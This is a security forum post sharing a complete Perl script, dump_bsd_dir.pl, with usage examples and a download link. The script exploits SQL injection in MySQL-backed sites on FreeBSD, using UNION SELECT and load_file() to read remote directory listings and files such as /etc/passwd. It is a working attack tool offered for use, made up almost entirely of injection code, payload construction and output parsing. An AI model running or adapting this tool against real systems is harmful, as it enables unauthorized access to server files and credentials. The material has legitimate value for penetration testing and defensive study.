Thread: dump_bsd_dir.pl: Dump bsd entries with mysql load_file

    Post dump_bsd_dir.pl: Dump bsd entries with mysql load_file

    Well, we all know that when a SQL injection is found in an application backed by MySQL on a FreeBSD system, load_file() can be pointed at a directory and returns the raw directory entries (on-disk dirent records) instead of an error. The following script disassembles that load_file() return value and prints the directory contents, so there is no need to go view-source in the browser to read it...

    Source:Dump bsd entries with mysql load_file

    Usage:
    Code:
    xi4oyu@3xpl4b:~$ perl dump_bsd_dir.pl
    dump_bsd_dir : List freebsd DIRS USE load_file with MYSQL
    By xi4oyu evil.xi4oyu#gmail.com
    http://www.pentestday.com
    
    usage: dump_bsd_dir.pl [options]
    -u : Inject url
    -d|-f : DIR/FILE to list
    Ext: dump_bsd_dir.pl -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,****BSD,3 -d /etc
    dump_bsd_dir.pl -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,****BSD,3 -f /etc/passwd

    Code:
    #!/usr/bin/perl
    use LWP::UserAgent;
    use strict;
    use Getopt::Std;
    use vars qw / %opt /;
     
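    use constant True => 1;
     
    # Placeholder inside the -u url that get_that_shit() replaces with the SQL
    # expression to run. It begins with "*", so any regex built from it has to
    # quote it (\Q...\E) or the pattern will not compile.
    my $rep_word = "****BSD";
    # Marker concatenated on both sides of the load_file() result so the payload
    # can be cut out of the surrounding page; sent to MySQL as a hex literal.
    my $sep_flag = "%!!";
    # Browser-looking User-Agent sent with the injection request.
    my $user_agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;.NET CLR 1.1.4122)";
    # Filled from the command line: -u (inject url), -d (directory), -f (file).
    # ($target_rep used to be declared here as well; nothing referenced it, so
    # it has been dropped.)
    my $target = '';
    my $dir = '';
    my $file = '';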
     
    sub usage{
    	# Print the usage banner to STDERR and terminate the script.
    	# Note: the bare "exit;" leaves exit status 0 even when usage() is
    	# reached because of a command-line error.
    print STDERR <<"EOF";
    dump_bsd_dir : List freebsd DIRS USE load_file with MYSQL
    By xi4oyu evil.xi4oyu#gmail.com
    http://www.pentestday.com
     
    usage: $0 [options] 
    -u	: Inject url
    -d|-f   : DIR/FILE to list
    Ext: $0 -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,****BSD,3 -d /etc
         $0 -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,****BSD,3 -f /etc/passwd
     
    EOF
    	exit;
     
    }
     
     
    sub hex_str{
    	# Encode a string as a MySQL hex literal ("0x" followed by two hex
    	# digits per byte), so it can be injected without quotes. An empty
    	# string yields the bare "0x".
    	my ($plain) = @_;
    	return '0x' . unpack('H*', $plain);
    }
     
     
     
    #This function parses the FreeBSD dirent struct (layout quoted below) and prints one line per entry
     
    =pod
    	src/sys/sys/dirent.h
    	Ref:http://fxr.watson.org/fxr/source/sys/dirent.h?v=FREEBSD7
       49 
       50 struct dirent {
       51         __uint32_t d_fileno;            /* file number of entry */
       52         __uint16_t d_reclen;            /* length of this record */
       53         __uint8_t  d_type;              /* file type, see below */
       54         __uint8_t  d_namlen;            /* length of string in d_name */
       55 #if __BSD_VISIBLE
       56 #define MAXNAMLEN       255
       57         char    d_name[MAXNAMLEN + 1];  /* name must be no longer than this */
       58 #else
       59         char    d_name[255 + 1];        /* name must be no longer than this */
       60 #endif
       61 };
       62 
       63 #if __BSD_VISIBLE
       64 /*
       65  * File types
       66  */
       67 #define DT_UNKNOWN       0
       68 #define DT_FIFO          1
       69 #define DT_CHR           2
       70 #define DT_DIR           4
       71 #define DT_BLK           6
       72 #define DT_REG           8
       73 #define DT_LNK          10
       74 #define DT_SOCK         12
       75 #define DT_WHT          14
     
    =cut
     
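    sub parse_dir{
    	# Decode the hex-encoded directory data returned by
    	# hex(load_file('/some/dir')) and print one "type<TAB>name" line per
    	# entry to STDOUT.
    	#
    	# Each record is a FreeBSD struct dirent (see the POD above): a fixed
    	# 8-byte header
    	#     uint32 d_fileno, uint16 d_reclen, uint8 d_type, uint8 d_namlen
    	# followed by d_namlen name bytes; d_reclen is the distance to the next
    	# record. One byte is two hex digits, so every offset below is doubled.
    	#
    	#   $dirent_hex - hex string as captured by get_that_shit(); may be the
    	#                 "ERROR" sentinel or undef, in which case nothing is
    	#                 printed.
    	# Returns nothing.
    	my ($dirent_hex) = @_;
    	return unless defined $dirent_hex;
     
    	# The first 48 hex digits (24 bytes) are skipped. That is exactly two
    	# minimal 12-byte records, presumably the "." and ".." entries that open
    	# every directory -- the original author gave no reason, so this is an
    	# inference (TODO confirm against a real dump).
    	my $dir = substr($dirent_hex, 48);
    	return unless defined $dir;
     
    	# d_type values from sys/dirent.h; anything else (DT_UNKNOWN, DT_REG)
    	# is reported as a plain file.
    	my %label_of = (
    		1  => "fifo:",
    		2  => "chr:",
    		4  => "dir:",
    		6  => "blk:",
    		8  => "file:",
    		10 => "link:",
    		12 => "socket:",
    		14 => "wht:",
    	);
     
    	my $index = 0;
    	my $total = length($dir);
    	while ($index + 16 <= $total) {
    		# "V v C C": explicit little-endian. The bytes come from the target
    		# (FreeBSD on x86 is little-endian), so the parse must not depend on
    		# the endianness of the host running this script.
    		my ($inode, $ent_len, $ent_type, $name_len) =
    			unpack("V v C C", pack("H*", substr($dir, $index, 16)));
     
    		# A record cannot be shorter than its own 8-byte header; zero or a
    		# smaller value means end of data (or garbage) -- either way, stop.
    		last if $ent_len < 8;
     
    		# A zero file number marks an unused slot (readdir(3) skips those);
    		# printing it would only show an empty name.
    		if ($inode != 0) {
    			my $name = pack("H*", substr($dir, $index + 16, $name_len * 2));
    			my $label = $label_of{$ent_type} || "file:";
    			$name .= "/" if $ent_type == 4;
    			# Names come from the remote filesystem: render control bytes as
    			# \xHH so a crafted name cannot drive the terminal.
    			$name =~ s/([\x00-\x1f\x7f])/sprintf("\\x%02x", ord($1))/ge;
    			print "$label\t$name\n";
    		}
     
    		$index += 2 * $ent_len;
    	}
    	return;
    }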
     
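    sub get_that_shit{
    	# Fire the injected query at the target and cut the payload out of the
    	# response: whatever sits between the two $sep_flag markers.
    	#
    	#   $hexed_str - SQL expression built by the caller; it replaces every
    	#                occurrence of the $rep_word placeholder in $target.
    	# Returns the text between the markers, or the literal string "ERROR"
    	# when no marker pair was found (the caller tests for that sentinel).
    	my ($hexed_str) = @_;
     
    	# $rep_word is "****BSD": interpolated unquoted, the leading "*" is a
    	# regex quantifier with nothing to quantify and the substitution dies
    	# with "Quantifier follows nothing". \Q...\E makes it a literal match.
    	my $url = $target;
    	$url =~ s/\Q$rep_word\E/$hexed_str/g;
     
    	my $ua = LWP::UserAgent->new;
    	$ua->agent($user_agent);
     
    	my $resp = $ua->request(HTTP::Request->new(GET => $url));
    	# ->content rather than ->decoded_content: the payload is raw file
    	# bytes (-f) or hex digits (-d); do not let LWP re-encode it.
    	my $content = $resp->content;
     
    	# Both markers are quoted with \Q as well; /s lets the payload span
    	# newlines. The greedy (.*) takes the outermost marker pair, as before.
    	if ($content =~ /\Q$sep_flag\E(.*)\Q$sep_flag\E/s) {
    		return $1;
    	}
     
    	# No markers: report the HTTP status so a wrong url / failed request
    	# is distinguishable from a NULL load_file() result.
    	print STDERR "no marker pair in response (" . $resp->status_line . ")\n";
    	return "ERROR";
    }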
     
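    # NOTE(review): an empty stub, "sub parse_dir { my $hex_code = shift; }",
    # used to be defined here, after the real parse_dir above. Perl keeps the
    # last definition of a sub, so the stub silently replaced the working parser
    # and "-d" printed nothing at all. The stub has been removed.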
     
    #================================================================#
    #Here We Go!
     
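    # -h is accepted explicitly so "usage if $opt{h}" below is reachable instead
    # of relying on getopts() rejecting an unknown option.
    my $opt_string = "u:d:f:h";
     
    usage if $#ARGV < 0;
     
    getopts("$opt_string",\%opt) or usage();
    usage if $opt{h}; 
     
    $target = $opt{u} if $opt{u};
    $dir = $opt{d} if $opt{d};
    $file = $opt{f} if $opt{f};
     
    # A target and at least one of -d / -f are mandatory.
    if(!$target || (!$dir && !$file)){
    	usage();
    }
     
    # Without the placeholder nothing would be injected and the request would
    # just fetch the page; say so instead of reporting a misleading "ERROR".
    if(index($target, $rep_word) < 0){
    	print STDERR "the -u url must contain the $rep_word placeholder\n";
    	exit 1;
    }
     
    my $sep_flag_hex = hex_str($sep_flag);
    my $hexed_str = "";
    if($dir){
    	# A directory's raw dirent bytes are binary, so they are hex()ed on the
    	# server. Only the load_file() result is hexed: the original wrapped the
    	# whole concat() in hex(), which hex-encoded the markers too, so the
    	# "%!!" pair could never be found in the response.
    	$hexed_str = "concat($sep_flag_hex,hex(load_file(".hex_str($dir).")),$sep_flag_hex)";
    }else{
    	$hexed_str = "concat($sep_flag_hex,load_file(".hex_str($file)."),$sep_flag_hex)";
    }
     
    my $ret_str = get_that_shit($hexed_str);
     
    # get_that_shit() returns the literal "ERROR" when no marker pair came back:
    # load_file() returned NULL (unreadable path, missing FILE privilege?), or
    # the injected column is not echoed in the page.
    if($ret_str eq "ERROR"){
    	print STDERR "no data returned for " . ($dir || $file) . "\n";
    	exit 1;
    }
     
    if($file){
    	# Raw, untrusted bytes from the remote file; printed as-is on purpose
    	# (binary files must survive), so pipe through a pager/hexdump if unsure.
    	print $ret_str;
    }else{
    	parse_dir($ret_str);
    }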
    You can download the full source here:
    http://www.linuxpentest.com/tools/sq...sd_entries.tgz
